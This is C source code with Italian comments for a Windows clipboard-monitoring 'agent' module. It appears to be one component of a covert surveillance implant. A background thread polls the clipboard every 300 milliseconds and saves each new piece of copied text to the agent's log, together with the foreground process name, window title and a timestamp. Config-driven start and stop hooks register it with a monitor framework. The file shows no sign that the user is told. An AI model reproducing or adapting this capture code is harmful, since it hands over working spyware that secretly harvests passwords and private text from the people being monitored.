BOOL bPM_ClipBoardStarted = FALSE; // Flag che indica se il monitor e' attivo o meno
BOOL bPM_cbcp = FALSE; // Semaforo per l'uscita del thread
HANDLE hClipBoardThread = NULL;

WCHAR *old_clipboard_content = NULL;


DWORD WINAPI PollClipBoard(DWORD dummy)
{
	HANDLE hData;
	HWND hFocus;
	WCHAR svTitle[SMLSIZE];
	WCHAR svProcName[SMLSIZE];
	WCHAR wsBuff[MEDSIZE];

	DWORD dwProcessId = 0;
	char *asc_proc_name = NULL;
	
	WCHAR *time_stamp;
	time_t aclock;
	WCHAR *clipboard_content;
	DWORD clip_len;

	LOOP {
		hFocus = GetForegroundWindow();
		OpenClipboard(hFocus);
		if ( (hData = GetClipboardData(CF_UNICODETEXT)) ) {
			clipboard_content = (WCHAR *)GlobalLock( hData );
			// Se e' la prima volta che trova contenuti, o se sono diversi dalla volta
			// precedente...
			if (clipboard_content && (!old_clipboard_content || wcscmp(old_clipboard_content, clipboard_content))) {
				clip_len = wcslen(clipboard_content)*2;
				clip_len += 2; // Aggiunge la NULL termination
				SAFE_FREE(old_clipboard_content);
				// Salva il contenuto della clipboard per confrontarlo con
				// i prossimi.
				if (old_clipboard_content = (WCHAR *)malloc(clip_len))
					memcpy(old_clipboard_content, clipboard_content, clip_len);
				GlobalUnlock( hData );
				CloseClipboard();
				
				// Scrive la finestra, il timestamp e il contenuto della clipboard salvato
				if (old_clipboard_content) {
					// Scrive il titolo della finestra e il timestamp
					memset(svTitle, 0, sizeof(svTitle));
					if ( SafeGetWindowText(hFocus, (LPWSTR)svTitle, SMLSIZE-2) == 0 )
						wsprintfW((LPWSTR)svTitle, L"UNKNOWN");

					// Scrive il nome del processo in foreground
					GetWindowThreadProcessId(hFocus, &dwProcessId);
					if (dwProcessId && (asc_proc_name = HM_FindProc(dwProcessId))) {
						memset(svProcName, 0, sizeof(svProcName));
						wnsprintfW((LPWSTR)svProcName, SMLSIZE-2, L"%hs", asc_proc_name);
						SAFE_FREE(asc_proc_name);
					} else 
						wsprintfW((LPWSTR)svProcName, L"UNKNOWN");

					// XXX Potrebbe esserci una race con l'altra wasctime
					// ma al massimo abbiamo uno \n in piu'...
					time( &aclock );               
					time_stamp = _wasctime(localtime(&aclock));
					time_stamp[24] = 0; // Toglie lo \n

					wnsprintfW((LPWSTR)wsBuff, MEDSIZE-2, L"\r\n\r\n-----[ %s ] [ %s ]----- %s\r\n", svProcName, svTitle, time_stamp);
					
					LOG_ReportLog(PM_CLIPBOARDAGENT, (BYTE *)wsBuff, wcslen(wsBuff)*2);
					LOG_ReportLog(PM_CLIPBOARDAGENT, (BYTE *)old_clipboard_content, wcslen(old_clipboard_content)*2);
				}
			} else {
				GlobalUnlock( hData );
				CloseClipboard();
			}	
		} else 
			CloseClipboard();

		CANCELLATION_POINT(bPM_cbcp);
		Sleep(300);
	}
}


DWORD __stdcall PM_ClipBoardStartStop(BOOL bStartFlag)
{
	DWORD dummy;

	// Se l'agent e' gia' nella condizione desiderata
	// non fa nulla.
	if (bPM_ClipBoardStarted == bStartFlag)
		return 0;

	// I log va inizializzato come prima cosa...
	if (bStartFlag && !LOG_InitAgentLog(PM_CLIPBOARDAGENT))
		return 0;

	bPM_ClipBoardStarted = bStartFlag;

	if (bStartFlag) {
		// Crea il thread che esegue monitora la clipboard
		hClipBoardThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)PollClipBoard, NULL, 0, &dummy);
	} else {
		// All'inizio non si stoppa perche' l'agent e' gia' nella condizione
		// stoppata (bPM_ClipBoardStarted = bStartFlag = FALSE)
		QUERY_CANCELLATION(hClipBoardThread, bPM_cbcp);
		// chiude il logging (come ultima cosa)
		LOG_StopAgentLog(PM_CLIPBOARDAGENT);
	}

	return 1;
}


DWORD __stdcall PM_ClipBoardInit(BYTE *conf_ptr, BOOL bStartFlag)
{
	PM_ClipBoardStartStop(bStartFlag);
	return 1;
}


void PM_ClipBoardRegister()
{
	// Non ha nessuna funzione di Dispatch
	AM_MonitorRegister(PM_CLIPBOARDAGENT, NULL, (BYTE *)PM_ClipBoardStartStop, (BYTE *)PM_ClipBoardInit, NULL);

	// Inizialmente i monitor devono avere una configurazione di default nel caso
	// non siano referenziati nel file di configurazione (partono comunque come stoppati).
	PM_ClipBoardInit(NULL, FALSE);
}